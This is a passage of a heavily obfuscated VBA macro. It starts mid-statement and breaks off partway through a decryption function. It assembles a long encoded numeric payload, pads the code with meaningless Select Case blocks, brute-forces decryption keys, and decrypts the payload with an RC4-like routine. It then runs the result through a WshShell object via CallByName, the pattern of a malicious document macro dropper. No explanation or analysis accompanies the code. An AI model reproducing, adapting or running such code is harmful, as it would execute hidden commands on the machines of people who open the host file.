W5l = W5l & "19939&-10335&32473&30994&1097&15165&-9443&-1340&17896&25964&-8520&-21146&25178&-17070&27913&11323&-31665&15814&22372&-871&-4184&-10594&-9263&6281&-13441&-26199&-12775&18765&8243&-6540&18189&-20317&30008&29681&18534&11054&-15710&-12026&-10534&25905&3223&20974&7349&-20427&396&19967&31588&-30551&-20969&17162&-18856&-27499&11945&-1196&19521&-10883&-21886&-23315&26551&-25797&-20176&18807&-8800&-27732&-3990&-15252&28777&-20937&7148&772&12675&-32591&20210&21275&-28461&30700&-4935&19643&22385&18578&-11764&23156&-3844&-14255&5619&3142&13306&15485&-14280&16657&6183&18177&30160&-7367&-26912&-2676&7481&10411&-21503&-31617&-5499&10881&-24453&-28402&25118&12910&-18578&-2046&2283&-3964&-9487&14268&32296&-17620&-9223&15612&17738&10636&19266&-1802&20625&19494&27738&18424&27503&-17582&21943&11391&106"
VKhT9 = 48
Select Case VKhT9
Case 1
VKhT9 = VKhT9 + 1
Case 17
VKhT9 = VKhT9 + VKhT9
Case Else
VKhT9 = VKhT9 - 1
End Select
W5l = W5l & "07&-31981&13148&-8125&29391&-19903&4535&21105&3198&-19565&25719&19598&-16920&-3852&23334&14147&22676&17592&-10805&28811&-29932&-6980&4380&-30633&13689&32596&20148&13242&-12798&16757&-59&-19224&-13360&-12671&-13418&5793&-15707&3543&-24822&-19509&-30869&-28154&27719&28405&-31815&-2980&-23066&-4454&-6723&31000&-1350&-7490&15087&-28123&-30383&-4899&-1175&-18825&-8179&25026&-32652&-11683&27934&21182&4894&-12293&-19402&-27268&25126&-10848&-2185&-26023&14732&4391&2065&-7887&7925&-8239&16241&26804&-23707&-6523&26750&9508&28332&2226&19371&-4712&25568&26159&-15725&-16078&-10856&18462&-27989&10429&14003&-13938&-22983&772&-32147&1927&22496&6660&-24072&20248&-7487&25576&13558&-26979&3752&391&2094&-25495&-22720&27222&-31211&-21665&-30006&-14884&14818&17281&-30488&28378&-24608&-23785&-26303&22774&"
DV1rN8V = 70
Select Case DV1rN8V
Case 5
DV1rN8V = DV1rN8V + 1
Case 28
DV1rN8V = DV1rN8V + DV1rN8V
Case Else
DV1rN8V = DV1rN8V - 1
End Select
W5l = W5l & "-4252&-14019&-26961&-5635&-22656&1306&22136&-21073&3146&-9966&-29897&-30558&-16669&29750&-31187&1707&-502&-8092&-17621&-28431&29463&-9182&28432&-32561&-6670&19299&-5436&11923&26253&-9796&-17863&19104&30061&-28814&-1666&12373&31365&-24723&10841&25455&9553&2053&-11603&20545&-19883&3641&8139&18546&-4789&21387&-28745&31292&23371&-25300&-4830&3823&21270&27759&18885&20085&-16283&-21604&10077&3916&25020&-20460&24092&-4751&-13971&3326&31342&-31391&-2316&-30160&20110&24843&-26463&4774&11423&30650&-27405&-20434&25257&13812&-6472&-17826&-32674&30851&11023&-23351&-18215&-8845&-15142&-9735&21364&-2916&-11848&27868&-18628&15061&28172&19296&5891&-14439&21240&-1962&24127&17662&5427&23496&8498&-7207&12124&8530&13179&-31247&-13595&24203&10466&-13668&23026&32722&14596&-685&-29399&-2388&17450&-8753&939"
NNR = 47
Select Case NNR
Case 40
NNR = NNR + 1
Case 62
NNR = NNR + NNR
Case Else
NNR = NNR - 1
End Select
W5l = W5l & "8&-10526&-20539&-18875&-7074&31686&-6183&1689&31517&-17839&-21755&10173&-19924&-9174&-6833&-9863&5675&-2261&-17782&3157&-6694&5973&20176&5324&3762&-20168&-27768&-19213&11171&11755&9331&15555&-25000&3010&-7881&-3942&-24111&12884&12687&-8044&-6556&25921&1949&-179&-28104&-15017&884&-27476&-5165&-7140&9144&19641&18639&19392&-27840&25652&21355&29611&-9607&32576&-5876&7851&-615&31460&-13327&18817&-18788&12752&-7429&3520&20532&-28611&-28390&25617&-28697&-754&-11279&3050&31941&31823&-16841&-22416&-22987&-1686&-22914&16694&6946&-15229&19784&-21002&-28825&-26119&32301&28135&-23760&23436&-5603&-14697&12851&-10009&-15122&-20594&-4664&-26617&24611&10394&14918&-7448&-20302&-17983&32582&5323&-254&-32491&-4260&-20284&-664&-31341&-97&12442&23797&-16986&4453&14892&-14092&-13023&-29334&753&24327&-3091"
Re = 1
Select Case Re
Case 29
Re = Re + 1
Case 70
Re = Re + Re
Case Else
Re = Re - 1
End Select
W5l = W5l & "1&23934&12772&-24034&-11914&22021&22875&-9773&22457&-14432&-12673&17600&-24741&-24374&23639&-25438&31193&-12938&-14722&-19983&-22775&20492&4744&9219&-29975&-6032&-28636&-12950&-16910&12494&-27316&-23918&1259&-23835&-21856&-21201&-24452&15906&31990&-27070&-606&30224&14196&-9849&-14441&4859&12957&-4885&-19118&-9737&-5617&6676&-12447&-20694&16633&11819&-1010&5620&-25220&15696&10418&8600&-25404&4794&15637&-21191&704&31042&-27922&9385&-3121&-3038&12212&-14479&-17009&-23858&21717&-15043&27999&2124&4225&-20385&-12964&-10574&19404&-23532&207&22693&1079&20830&-22425&-28157&-29240&9516&20321&30163&29677&2611&20629&23016&31519&26785&-9331&8220&1849&16639&16918&-31564&9910&-17633&-32241&5728&26293&-25586&29087&-8716&-1907&21230&-12371&-2648&-7154&23094&-32371&4577&23940&-25446&-10616&30948&1105"
NcEgv5 = 69
Select Case NcEgv5
Case 59
NcEgv5 = NcEgv5 + 1
Case 17
NcEgv5 = NcEgv5 + NcEgv5
Case Else
NcEgv5 = NcEgv5 - 1
End Select
W5l = W5l & "6&-2278&-7055&-15393&-14871&23157&19822&23735&17652&32263&-15898&-23933&7857&1394&29884&-14412&30159&-20966&11670&281&-10467&-28619&-5080&-19484&3236&-26179&32186&-3192&1638&25836&7835&-18823&-21212&-8231&-25295&3085&16044&31505&-20729&29723&-11753&-13808&-24378&18615&5453&-11669&7413&-22753&2914&-9457&-23211&-9527&23145&-25949&14151&12692&-14416&-7842&17894&-1010&-29952&3451&-9273&7741&-22607&9704&17952&2831&-24760&13601&-4963&9335&13390&9477&-22672&28826&-8864&-2071&-21889&24908&-2306&-13630&-14645&24798&-723&1184&12436&-21716&10484&-13787&-1184&28649&-16844&2821&-6141&12270&-19867&-27251&2348&16066&-21157&22694&3847&31094&-21419&31139&26444&16144&-9360&28282&30464&-26438&-28158&18066&16607&-6849&-27884&31765&20648&784&-6891&-16346&-10214&3609&-600&31582&14793&-9817&23929&-8447&32"
JvaWope = 79
Select Case JvaWope
Case 58
JvaWope = JvaWope + 1
Case 20
JvaWope = JvaWope + JvaWope
Case Else
JvaWope = JvaWope - 1
End Select
W5l = W5l & "536&-12816&-13315&-28937&-16245&-1560&-3532&14021&23395&10188&28489&31619&-5032&-11593&5805&30334&30600&15516&20633&-15762&-26651&19608&-26257&-17088&-27204&-17231&-5553&15674&-27506&7987&32298&-8903&-3090&-32085&-14119&-17786&-20128&10004&-6626&-24513&-29301&11595&21607&-4114&-3800&-30496&13803&-31755&23191&-24077&-14960&168&-14236&-29350&-29943&24056&-14216&16451&22600&24276&17859&-2158&-23267&787&-26002&-30943&-32368&22469&10301&-26908&17198&30382&-1626&-26863&17336&16767&-14056&-12186&19777&-4004&-6030&9306&-6036&-29987&-25124&3058&2574&-27061&-5045&15489&-18735&-20275&-3235&5196&15186&-2899&15629&9766&-22180&-234&16651&22304&20932&25591&-16023&-19274&-7624&-2234&4241&-28508&19587&-18215&7712&5490&-9146&-32376&17488&2749&-16489&3203&-22592&-5881&1352&-9033&17761&5885&-32163&-768"
JDPHu = 83
Select Case JDPHu
Case 31
JDPHu = JDPHu + 1
Case 60
JDPHu = JDPHu + JDPHu
Case Else
JDPHu = JDPHu - 1
End Select
W5l = W5l & "8&8399&-28755&-13993&22502&16563&-6773&18740&-23273&-2067&26264&-19605&-17411&-6806&5090&6033&-23553&15374&1860&-10561&-27104&-22924&-31082&-6386&12631&-24082&15956&8264&27074&13333&-31430&1979&23825&23667&-1872&865&23080&-6449&16222&2966&18600&-18053&-13085&21482&28693&32012&21637&-25131&16034&25204&-5929&-29178&-20867&-31469&8535&22805&10851&27845&27466&1091&-18297&-4878&17156&27888&30364&4048&20286&18699&-18464&26485&27783&17580&-8426&29479&9848&4705&-18339&-16472&18842&11931&9794&-16615&3337&-4119&-14063&2555&-16585&26865&23336&-14938&-29594&11907&-2660&-387&-15725&-11283&9265&-4726&-20145&-26433&-3196&30868&31559&-12650&21714&13804&-9655&-26651&18471&22397&25868&-31730&22194&20782&-23461&-4149&-25794&23563&-21740&-27877&-21992&20&17698&17432&23262&-10935&1358&-21050&5673&-16837"
J1gyQ = 78
Select Case J1gyQ
Case 47
J1gyQ = J1gyQ + 1
Case 13
J1gyQ = J1gyQ + J1gyQ
Case Else
J1gyQ = J1gyQ - 1
End Select
W5l = W5l & "&14561&18787&20718&-1520&-1732&2089&3508&-9047&32120&-12703&27360&-17081&-1686&-4037&-15834&8191&-9226&23273&-7591&25169&26705&1413&11851&-7108&7223&-476&19358&30931&-667&-31224&-4337&23186&1967&11151&-5569&12191&-21282&24919&1337&24522&-28187&-3745&25478&25767&-15785&-19493&-752&32325&-6496&19099&2653&-27253&-13148&-19524&5627&-27101&-28825&-23695&-10170&-23929&12770&-5556&-12127&7982&7656&-17884&-11875&583&-1486&-2440&-19683&6446&11301&-4748&-18071&-19319&-11481&1603&17287&7479&9372&-29561&-32101&22480&13258&-4244&6187&-20913&16981&12018&-11157&-2475&-5955&-6082&-31371&19852&-29146&32268&-24579&29855&24948&12565&-26728&14956&20446&-30997&24720&9243&-30458&26320&-10195&-28525&-22534&23705&-16749&-29561&13455&8556&9627&19179&-16538&-22026&27477&3055&-9608&-8745&22457&17476&12821&327"
TK9R9Y = 91
Select Case TK9R9Y
Case 91
TK9R9Y = TK9R9Y + 1
Case 66
TK9R9Y = TK9R9Y + TK9R9Y
Case Else
TK9R9Y = TK9R9Y - 1
End Select
W5l = W5l & "50&-18529&46"
Ogl = 82
Select Case Ogl
Case 74
Ogl = Ogl + 1
Case 96
Ogl = Ogl + Ogl
Case Else
Ogl = Ogl - 1
End Select
Dim VXm() As String, L0Gtop As Integer
UoN = 97
Select Case UoN
Case 87
UoN = UoN + 1
Case 44
UoN = UoN + UoN
Case Else
UoN = UoN - 1
End Select
VXm = Split(W5l, W55F((791 - 753)))
UsVan = 47
Select Case UsVan
Case 38
UsVan = UsVan + 1
Case 39
UsVan = UsVan + UsVan
Case Else
UsVan = UsVan - 1
End Select
ReDim EFJ(2057)
ICLqZ0 = 27
Select Case ICLqZ0
Case 85
ICLqZ0 = ICLqZ0 + 1
Case 37
ICLqZ0 = ICLqZ0 + ICLqZ0
Case Else
ICLqZ0 = ICLqZ0 - 1
End Select
For L0Gtop = 0 To 2057
EFJ(L0Gtop) = VXm(L0Gtop)
Next L0Gtop
Dim W5nx As String, CSTjKto As Long, FFnkG6 As String, FoC As String, NkqjQX As String, OO1eru As String, MAgmyhc As String, J8 As String, A18jH() As Byte
AdWe = 97
Select Case AdWe
Case 83
AdWe = AdWe + 1
Case 53
AdWe = AdWe + AdWe
Case Else
AdWe = AdWe - 1
End Select
Muu = 84
Select Case Muu
Case 77
Muu = Muu + 1
Case 45
Muu = Muu + Muu
Case Else
Muu = Muu - 1
End Select
Dim U5E33(14) As Byte, NQJQ(33) As Byte
LkHo2 = 97
Select Case LkHo2
Case 51
LkHo2 = LkHo2 + 1
Case 89
LkHo2 = LkHo2 + LkHo2
Case Else
LkHo2 = LkHo2 - 1
End Select
U5E33(0) = 206
U5E33(1) = 116
U5E33(2) = 12
U5E33(3) = 230
U5E33(4) = 217
U5E33(5) = 82
U5E33(6) = 103
U5E33(7) = 126
U5E33(8) = 118
U5E33(9) = 17
U5E33(10) = 166
U5E33(11) = 182
U5E33(12) = 139
U5E33(13) = 52
U5E33(14) = 195
F583nt = 61
Select Case F583nt
Case 8
F583nt = F583nt + 1
Case 20
F583nt = F583nt + F583nt
Case Else
F583nt = F583nt - 1
End Select
NQJQ(0) = 68
NQJQ(1) = 68
NQJQ(2) = 66
NQJQ(3) = 66
NQJQ(4) = 113
NQJQ(5) = 86
NQJQ(6) = 86
NQJQ(7) = 110
NQJQ(8) = 68
NQJQ(9) = 122
NQJQ(10) = 109
NQJQ(11) = 75
NQJQ(12) = 97
NQJQ(13) = 113
RgBVGF = 81
Select Case RgBVGF
Case 85
RgBVGF = RgBVGF + 1
Case 48
RgBVGF = RgBVGF + RgBVGF
Case Else
RgBVGF = RgBVGF - 1
End Select
For CSTjKto = IKJ(UHxM) To IKJ(B1D)
NQJQ(14) = V9rjJ(CSTjKto, 1)
NQJQ(15) = V9rjJ(CSTjKto, 2)
NQJQ(16) = V9rjJ(CSTjKto, 3)
NQJQ(17) = V9rjJ(CSTjKto, 4)
NQJQ(18) = NQJQ(14)
NQJQ(19) = NQJQ(15)
NQJQ(20) = NQJQ(16)
NQJQ(21) = NQJQ(17)
NQJQ(22) = NQJQ(14)
NQJQ(23) = NQJQ(15)
NQJQ(24) = NQJQ(16)
NQJQ(25) = NQJQ(17)
NQJQ(26) = NQJQ(14)
NQJQ(27) = NQJQ(15)
NQJQ(28) = NQJQ(16)
NQJQ(29) = NQJQ(17)
NQJQ(30) = NQJQ(14)
NQJQ(31) = NQJQ(15)
NQJQ(32) = NQJQ(16)
NQJQ(33) = NQJQ(17)
If CBNIP8i(U5E33, NQJQ) = "FmL8JG0uNeJBLI8" Then Exit For
Next CSTjKto
WVCti1 = 67
Select Case WVCti1
Case 81
WVCti1 = WVCti1 + 1
Case 13
WVCti1 = WVCti1 + WVCti1
Case Else
WVCti1 = WVCti1 - 1
End Select
Dim B7kc9qn(10) As Byte, JA7sVq(34) As Byte
Wq0t = 47
Select Case Wq0t
Case 29
Wq0t = Wq0t + 1
Case 55
Wq0t = Wq0t + Wq0t
Case Else
Wq0t = Wq0t - 1
End Select
B7kc9qn(0) = 10
B7kc9qn(1) = 4
B7kc9qn(2) = 66
B7kc9qn(3) = 181
B7kc9qn(4) = 158
B7kc9qn(5) = 152
B7kc9qn(6) = 170
B7kc9qn(7) = 157
B7kc9qn(8) = 209
B7kc9qn(9) = 215
B7kc9qn(10) = 153
D3UZA7 = 1
Select Case D3UZA7
Case 27
D3UZA7 = D3UZA7 + 1
Case 2
D3UZA7 = D3UZA7 + D3UZA7
Case Else
D3UZA7 = D3UZA7 - 1
End Select
JA7sVq(0) = 76
JA7sVq(1) = 115
JA7sVq(2) = 82
JA7sVq(3) = 67
JA7sVq(4) = 84
JA7sVq(5) = 57
JA7sVq(6) = 98
JA7sVq(7) = 65
JA7sVq(8) = 75
JA7sVq(9) = 76
JA7sVq(10) = 105
JA7sVq(11) = 69
JA7sVq(12) = 66
JA7sVq(13) = 48
JA7sVq(14) = 119
M8i = 33
Select Case M8i
Case 55
M8i = M8i + 1
Case 43
M8i = M8i + M8i
Case Else
M8i = M8i - 1
End Select
For CSTjKto = IKJ(UHxM) To IKJ(B1D)
JA7sVq(15) = V9rjJ(CSTjKto, 1)
JA7sVq(16) = V9rjJ(CSTjKto, 2)
JA7sVq(17) = V9rjJ(CSTjKto, 3)
JA7sVq(18) = V9rjJ(CSTjKto, 4)
JA7sVq(19) = JA7sVq(15)
JA7sVq(20) = JA7sVq(16)
JA7sVq(21) = JA7sVq(17)
JA7sVq(22) = JA7sVq(18)
JA7sVq(23) = JA7sVq(15)
JA7sVq(24) = JA7sVq(16)
JA7sVq(25) = JA7sVq(17)
JA7sVq(26) = JA7sVq(18)
JA7sVq(27) = JA7sVq(15)
JA7sVq(28) = JA7sVq(16)
JA7sVq(29) = JA7sVq(17)
JA7sVq(30) = JA7sVq(18)
JA7sVq(31) = JA7sVq(15)
JA7sVq(32) = JA7sVq(16)
JA7sVq(33) = JA7sVq(17)
JA7sVq(34) = JA7sVq(18)
If CBNIP8i(B7kc9qn, JA7sVq) = "EJPE91dEKtX" Then Exit For
Next CSTjKto
MPgZ = 75
Select Case MPgZ
Case 67
MPgZ = MPgZ + 1
Case 90
MPgZ = MPgZ + MPgZ
Case Else
MPgZ = MPgZ - 1
End Select
Dim D4MCa(18) As Byte, PifGY(40) As Byte
BFvZEOj = 89
Select Case BFvZEOj
Case 26
BFvZEOj = BFvZEOj + 1
Case 15
BFvZEOj = BFvZEOj + BFvZEOj
Case Else
BFvZEOj = BFvZEOj - 1
End Select
D4MCa(0) = 53
D4MCa(1) = 202
D4MCa(2) = 110
D4MCa(3) = 210
D4MCa(4) = 70
D4MCa(5) = 204
D4MCa(6) = 99
D4MCa(7) = 90
D4MCa(8) = 207
D4MCa(9) = 60
D4MCa(10) = 220
D4MCa(11) = 104
D4MCa(12) = 122
D4MCa(13) = 55
D4MCa(14) = 76
D4MCa(15) = 18
D4MCa(16) = 102
D4MCa(17) = 87
D4MCa(18) = 177
Q85 = 58
Select Case Q85
Case 59
Q85 = Q85 + 1
Case 56
Q85 = Q85 + Q85
Case Else
Q85 = Q85 - 1
End Select
PifGY(0) = 89
PifGY(1) = 66
PifGY(2) = 82
PifGY(3) = 85
PifGY(4) = 117
PifGY(5) = 54
PifGY(6) = 97
PifGY(7) = 79
PifGY(8) = 54
PifGY(9) = 82
PifGY(10) = 103
PifGY(11) = 56
PifGY(12) = 85
PifGY(13) = 103
PifGY(14) = 68
PifGY(15) = 49
PifGY(16) = 83
PifGY(17) = 115
PifGY(18) = 77
PifGY(19) = 115
PifGY(20) = 108
Vv3tU = 40
Select Case Vv3tU
Case 45
Vv3tU = Vv3tU + 1
Case 29
Vv3tU = Vv3tU + Vv3tU
Case Else
Vv3tU = Vv3tU - 1
End Select
For CSTjKto = IKJ(UHxM) To IKJ(B1D)
PifGY(21) = V9rjJ(CSTjKto, 1)
PifGY(22) = V9rjJ(CSTjKto, 2)
PifGY(23) = V9rjJ(CSTjKto, 3)
PifGY(24) = V9rjJ(CSTjKto, 4)
PifGY(25) = PifGY(21)
PifGY(26) = PifGY(22)
PifGY(27) = PifGY(23)
PifGY(28) = PifGY(24)
PifGY(29) = PifGY(21)
PifGY(30) = PifGY(22)
PifGY(31) = PifGY(23)
PifGY(32) = PifGY(24)
PifGY(33) = PifGY(21)
PifGY(34) = PifGY(22)
PifGY(35) = PifGY(23)
PifGY(36) = PifGY(24)
PifGY(37) = PifGY(21)
PifGY(38) = PifGY(22)
PifGY(39) = PifGY(23)
PifGY(40) = PifGY(24)
If CBNIP8i(D4MCa, PifGY) = "MCXTDIa55V6CEU5HjUH" Then Exit For
Next CSTjKto
U0 = 66
Select Case U0
Case 92
U0 = U0 + 1
Case 13
U0 = U0 + U0
Case Else
U0 = U0 - 1
End Select
Dim Sbvlq5(12) As Byte, NaB3t(27) As Byte
Ww4X0f = 6
Select Case Ww4X0f
Case 60
Ww4X0f = Ww4X0f + 1
Case 24
Ww4X0f = Ww4X0f + Ww4X0f
Case Else
Ww4X0f = Ww4X0f - 1
End Select
Sbvlq5(0) = 127
Sbvlq5(1) = 219
Sbvlq5(2) = 17
Sbvlq5(3) = 83
Sbvlq5(4) = 221
Sbvlq5(5) = 171
Sbvlq5(6) = 91
Sbvlq5(7) = 237
Sbvlq5(8) = 246
Sbvlq5(9) = 67
Sbvlq5(10) = 249
Sbvlq5(11) = 7
Sbvlq5(12) = 168
TZwVVNI = 83
Select Case TZwVVNI
Case 27
TZwVVNI = TZwVVNI + 1
Case 95
TZwVVNI = TZwVVNI + TZwVVNI
Case Else
TZwVVNI = TZwVVNI - 1
End Select
NaB3t(0) = 85
NaB3t(1) = 80
NaB3t(2) = 71
NaB3t(3) = 52
NaB3t(4) = 118
NaB3t(5) = 54
NaB3t(6) = 75
NaB3t(7) = 75
D1W = 5
Select Case D1W
Case 28
D1W = D1W + 1
Case 60
D1W = D1W + D1W
Case Else
D1W = D1W - 1
End Select
For CSTjKto = IKJ(UHxM) To IKJ(B1D)
NaB3t(8) = V9rjJ(CSTjKto, 1)
NaB3t(9) = V9rjJ(CSTjKto, 2)
NaB3t(10) = V9rjJ(CSTjKto, 3)
NaB3t(11) = V9rjJ(CSTjKto, 4)
NaB3t(12) = NaB3t(8)
NaB3t(13) = NaB3t(9)
NaB3t(14) = NaB3t(10)
NaB3t(15) = NaB3t(11)
NaB3t(16) = NaB3t(8)
NaB3t(17) = NaB3t(9)
NaB3t(18) = NaB3t(10)
NaB3t(19) = NaB3t(11)
NaB3t(20) = NaB3t(8)
NaB3t(21) = NaB3t(9)
NaB3t(22) = NaB3t(10)
NaB3t(23) = NaB3t(11)
NaB3t(24) = NaB3t(8)
NaB3t(25) = NaB3t(9)
NaB3t(26) = NaB3t(10)
NaB3t(27) = NaB3t(11)
If CBNIP8i(Sbvlq5, NaB3t) = "RGmZ3B5hyC5DD" Then Exit For
Next CSTjKto
Qc = 28
Select Case Qc
Case 18
Qc = Qc + 1
Case 74
Qc = Qc + Qc
Case Else
Qc = Qc - 1
End Select
TYq5 = 95
Select Case TYq5
Case 96
TYq5 = TYq5 + 1
Case 93
TYq5 = TYq5 + TYq5
Case Else
TYq5 = TYq5 - 1
End Select
Dim Kik As Long, DU As Long, CPQ As Long, B1y As Long, JwdCYW(4118) As Byte, BHiaA As Long, NUP As String
AJxUR5 = 17
Select Case AJxUR5
Case 65
AJxUR5 = AJxUR5 + 1
Case 21
AJxUR5 = AJxUR5 + AJxUR5
Case Else
AJxUR5 = AJxUR5 - 1
End Select
For Kik = 0 To IKJ(EFJ)
LVi = 20
Select Case LVi
Case 95
LVi = LVi + 1
Case 69
LVi = LVi + LVi
Case Else
LVi = LVi - 1
End Select
For DU = 1 To 2
Yj2KM = 10
Select Case Yj2KM
Case 52
Yj2KM = Yj2KM + 1
Case 98
Yj2KM = Yj2KM + Yj2KM
Case Else
Yj2KM = Yj2KM - 1
End Select
If CPQ = 1 Then
Kbp4HiJ = 72
Select Case Kbp4HiJ
Case 76
Kbp4HiJ = Kbp4HiJ + 1
Case 39
Kbp4HiJ = Kbp4HiJ + Kbp4HiJ
Case Else
Kbp4HiJ = Kbp4HiJ - 1
End Select
JwdCYW(B1y) = FXZ1Aht(EFJ(BHiaA))(CPQ)
VA1p = 67
Select Case VA1p
Case 64
VA1p = VA1p + 1
Case 74
VA1p = VA1p + VA1p
Case Else
VA1p = VA1p - 1
End Select
Else
Xl2SC = 39
Select Case Xl2SC
Case 87
Xl2SC = Xl2SC + 1
Case 17
Xl2SC = Xl2SC + Xl2SC
Case Else
Xl2SC = Xl2SC - 1
End Select
CPQ = 0
EK0wq = 52
Select Case EK0wq
Case 91
EK0wq = EK0wq + 1
Case 47
EK0wq = EK0wq + EK0wq
Case Else
EK0wq = EK0wq - 1
End Select
JwdCYW(B1y) = FXZ1Aht(EFJ(BHiaA))(CPQ)
WMpTt = 93
Select Case WMpTt
Case 40
WMpTt = WMpTt + 1
Case 74
WMpTt = WMpTt + WMpTt
Case Else
WMpTt = WMpTt - 1
End Select
End If
AuB = 43
Select Case AuB
Case 78
AuB = AuB + 1
Case 72
AuB = AuB + AuB
Case Else
AuB = AuB - 1
End Select
B1y = B1y + 1
J7kYZxL = 90
Select Case J7kYZxL
Case 38
J7kYZxL = J7kYZxL + 1
Case 23
J7kYZxL = J7kYZxL + J7kYZxL
Case Else
J7kYZxL = J7kYZxL - 1
End Select
CPQ = CPQ + 1
Kd = 54
Select Case Kd
Case 11
Kd = Kd + 1
Case 15
Kd = Kd + Kd
Case Else
Kd = Kd - 1
End Select
Next DU
I3t1AqO = 62
Select Case I3t1AqO
Case 74
I3t1AqO = I3t1AqO + 1
Case 11
I3t1AqO = I3t1AqO + I3t1AqO
Case Else
I3t1AqO = I3t1AqO - 1
End Select
BHiaA = BHiaA + 1
LN6YJs4 = 55
Select Case LN6YJs4
Case 68
LN6YJs4 = LN6YJs4 + 1
Case 27
LN6YJs4 = LN6YJs4 + LN6YJs4
Case Else
LN6YJs4 = LN6YJs4 - 1
End Select
Next Kik
QjeFk = 1
Select Case QjeFk
Case 70
QjeFk = QjeFk + 1
Case 35
QjeFk = QjeFk + QjeFk
Case Else
QjeFk = QjeFk - 1
End Select
Dim G8p(137) As Byte, SaP As Long, EL5U344 As Long
WOZs8o = 83
Select Case WOZs8o
Case 22
WOZs8o = WOZs8o + 1
Case 81
WOZs8o = WOZs8o + WOZs8o
Case Else
WOZs8o = WOZs8o - 1
End Select
SaP = 0
J5Uzpy = 43
Select Case J5Uzpy
Case 31
J5Uzpy = J5Uzpy + 1
Case 66
J5Uzpy = J5Uzpy + J5Uzpy
Case Else
J5Uzpy = J5Uzpy - 1
End Select
EL5U344 = 0
Cy7P1 = 80
Select Case Cy7P1
Case 56
Cy7P1 = Cy7P1 + 1
Case 74
Cy7P1 = Cy7P1 + Cy7P1
Case Else
Cy7P1 = Cy7P1 - 1
End Select
For CSTjKto = 0 To IKJ(NQJQ)
G8p(CSTjKto) = NQJQ(CSTjKto)
SaP = SaP + 1
Next CSTjKto
XQ = 59
Select Case XQ
Case 68
XQ = XQ + 1
Case 39
XQ = XQ + XQ
Case Else
XQ = XQ - 1
End Select
For CSTjKto = IKJ(NQJQ) + 1 To IKJ(JA7sVq) + SaP
G8p(CSTjKto) = JA7sVq(EL5U344)
EL5U344 = EL5U344 + 1
SaP = SaP + 1
Next CSTjKto
BAlOimK = 53
Select Case BAlOimK
Case 24
BAlOimK = BAlOimK + 1
Case 11
BAlOimK = BAlOimK + BAlOimK
Case Else
BAlOimK = BAlOimK - 1
End Select
EL5U344 = 0
QIzX = 81
Select Case QIzX
Case 65
QIzX = QIzX + 1
Case 14
QIzX = QIzX + QIzX
Case Else
QIzX = QIzX - 1
End Select
For CSTjKto = SaP To IKJ(PifGY) + SaP
G8p(CSTjKto) = PifGY(EL5U344)
EL5U344 = EL5U344 + 1
SaP = SaP + 1
Next CSTjKto
VYuI = 8
Select Case VYuI
Case 1
VYuI = VYuI + 1
Case 67
VYuI = VYuI + VYuI
Case Else
VYuI = VYuI - 1
End Select
EL5U344 = 0
UI8KI = 72
Select Case UI8KI
Case 19
UI8KI = UI8KI + 1
Case 53
UI8KI = UI8KI + UI8KI
Case Else
UI8KI = UI8KI - 1
End Select
For CSTjKto = SaP To IKJ(NaB3t) + SaP
G8p(CSTjKto) = NaB3t(EL5U344)
EL5U344 = EL5U344 + 1
SaP = SaP + 1
Next CSTjKto
Uax5 = 42
Select Case Uax5
Case 35
Uax5 = Uax5 + 1
Case 57
Uax5 = Uax5 + Uax5
Case Else
Uax5 = Uax5 - 1
End Select
A18jH = JwdCYW
SeCC = 1
Select Case SeCC
Case 92
SeCC = SeCC + 1
Case 16
SeCC = SeCC + SeCC
Case Else
SeCC = SeCC - 1
End Select
ReDim Preserve A18jH(4114)
Uia6 = 5
Select Case Uia6
Case 20
Uia6 = Uia6 + 1
Case 60
Uia6 = Uia6 + Uia6
Case Else
Uia6 = Uia6 - 1
End Select
NUP = CBNIP8i(A18jH, G8p)
Tpp6 = 11
Select Case Tpp6
Case 13
Tpp6 = Tpp6 + 1
Case 9
Tpp6 = Tpp6 + Tpp6
Case Else
Tpp6 = Tpp6 - 1
End Select
Yki9Y = 80
Select Case Yki9Y
Case 6
Yki9Y = Yki9Y + 1
Case 4
Yki9Y = Yki9Y + Yki9Y
Case Else
Yki9Y = Yki9Y - 1
End Select
GHc = 34
Select Case GHc
Case 82
GHc = GHc + 1
Case 83
GHc = GHc + GHc
Case Else
GHc = GHc - 1
End Select
Dim GaChQzo As New WshShell
YEAsLZ = 68
Select Case YEAsLZ
Case 20
YEAsLZ = YEAsLZ + 1
Case 37
YEAsLZ = YEAsLZ + YEAsLZ
Case Else
YEAsLZ = YEAsLZ - 1
End Select
Dim XhvD80(2) As Byte, UB5hI(10) As Byte
AYcBr = 18
Select Case AYcBr
Case 90
AYcBr = AYcBr + 1
Case 98
AYcBr = AYcBr + AYcBr
Case Else
AYcBr = AYcBr - 1
End Select
XhvD80(0) = 107
XhvD80(1) = 119
XhvD80(2) = 174
QRmhphT = 23
Select Case QRmhphT
Case 67
QRmhphT = QRmhphT + 1
Case 9
QRmhphT = QRmhphT + QRmhphT
Case Else
QRmhphT = QRmhphT - 1
End Select
UB5hI(0) = 68
UB5hI(1) = 54
UB5hI(2) = 109
UB5hI(3) = 48
UB5hI(4) = 67
UB5hI(5) = 107
UB5hI(6) = 113
UB5hI(7) = 119
UB5hI(8) = 98
UB5hI(9) = 69
UB5hI(10) = 67
CallByName GaChQzo, CBNIP8i(XhvD80, UB5hI), 3018 - 3017, NUP, 6995 - 6995, 2657 - 2657
WeMwUdh = 21
Select Case WeMwUdh
Case 33
WeMwUdh = WeMwUdh + 1
Case 70
WeMwUdh = WeMwUdh + WeMwUdh
Case Else
WeMwUdh = WeMwUdh - 1
End Select
End Sub
Private Function CBNIP8i(Gq() As Byte, CgB() As Byte) As String
Dmep3a = 67
Select Case Dmep3a
Case 80
Dmep3a = Dmep3a + 1
Case 39
Dmep3a = Dmep3a + Dmep3a
Case Else
Dmep3a = Dmep3a - 1
End Select
On Error Resume Next
Ta8TCjE = 38
Select Case Ta8TCjE
Case 22
Ta8TCjE = Ta8TCjE + 1
Case 69
Ta8TCjE = Ta8TCjE + Ta8TCjE
Case Else
Ta8TCjE = Ta8TCjE - 1
End Select
Dim Ock9y3(0 To 255) As Integer, FCmxt As Long, UzP As Long, Q7t As Long, LG14 As Byte, WVEm6() As Byte, BZTtv() As Byte
CaBIwx = 98
Select Case CaBIwx
Case 25
CaBIwx = CaBIwx + 1
Case 73
CaBIwx = CaBIwx + CaBIwx
Case Else
CaBIwx = CaBIwx - 1
End Select
ReDim WVEm6(IKJ(Gq)) As Byte
QlO = 84
Select Case QlO
Case 8
QlO = QlO + 1
Case 84
QlO = QlO + QlO
Case Else
QlO = QlO - 1
End Select
WVEm6 = Gq
Mlz = 89
Select Case Mlz
Case 50
Mlz = Mlz + 1
Case 67
Mlz = Mlz + Mlz
Case Else
Mlz = Mlz - 1
End Select
